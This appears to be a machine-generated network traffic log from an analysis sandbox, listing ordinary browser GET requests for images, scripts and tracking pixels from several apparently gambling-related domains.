Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/parner/argentina_logo.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mimlib.wasm HTTP/1.1Host: stt-wasm.ai4funs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"88346086e882b94f3127e009fea42084"
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/vendor.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/common.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/app/03.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/zbw?r=7649153494 HTTP/1.1Host: ocsapi1961.hydqef.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/pt_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/zh_CN/mobileTopic/images/special_3.jpg HTTP/1.1Host: brhrjf.yuhu06.xyzConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/public/vendor.dll.js HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/lib/jquery.min-1.9.1.js HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ocs/zbw?r=9375188508 HTTP/1.1Host: ocsapi-aka.blackkhaki918.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/manifest.js HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/vendor.js HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/bbin_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/pwv/sn.website.logo.image.url HTTP/1.1Host: ocsapi-aws.huayidm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/dg_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/common.js HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fiximg/ac-20200404/fileupload/uy09/202307/202307200237350.png HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/t4043.js HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js326.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=3717168674 HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/383/menu/menubg.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&terminal=1&r=6219241436 HTTP/1.1Host: ahd-ocssn.qqxgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aliyungf_tc=3de529fcf893d6d3ee212d9780b2d6d818dae7d7247c306b9d3885f4ac9f9c38
Source: global trafficHTTP traffic detected: GET /index/getAppsUrl.html?device=android&fPixelId=&accessToken=&apiVersion= HTTP/1.1Host: x551005.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://x551005.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: route=61ee84c9f68236309da705261df10e5a
Source: global trafficHTTP traffic detected: GET /wasm_exec.js HTTP/1.1Host: stt-wasm.ai4funs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/service/pb_icon.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/guide.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=2654442886 HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=5294706042 HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&terminal=1&r=6219241436 HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /zb-cloud/pwv/agent.code HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/t4045-otherConf-js.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mt-cloud/api/sn.maintain.list HTTP/1.1Host: ocsapi-lc.tingmeikj.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/t4045-index-js.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/383/headerTip.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/components/383/logo.js HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wns732.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/images/partner/partner-hongtu-white.png HTTP/1.1Host: x551005.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: route=61ee84c9f68236309da705261df10e5a
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/theme/default/layer.css?v=3.1.0 HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/moment.js HTTP/1.1Host: 8vpfnx.eveday.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e933002.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/allbet_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/service/convenient_icon.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/video/mg_h.jpg HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/service/security_icon1.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/service/icon_kuaijie.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=8285707295 HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=5735666541 HTTP/1.1Host: zb1-hw.qectyoua.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/240516-03/static/js/t3685.js HTTP/1.1Host: zb-qq.gzjqwlkj.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yh8613.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cc.png?r=6167440772 HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/382/top/img_bg2.jpg HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/312/parner/logo_monaco.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hg679.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/382/button/icon_vip_n.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pc/image-pc/index/382/button/icon_prom_n.png HTTP/1.1Host: zb-hw.czwygs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
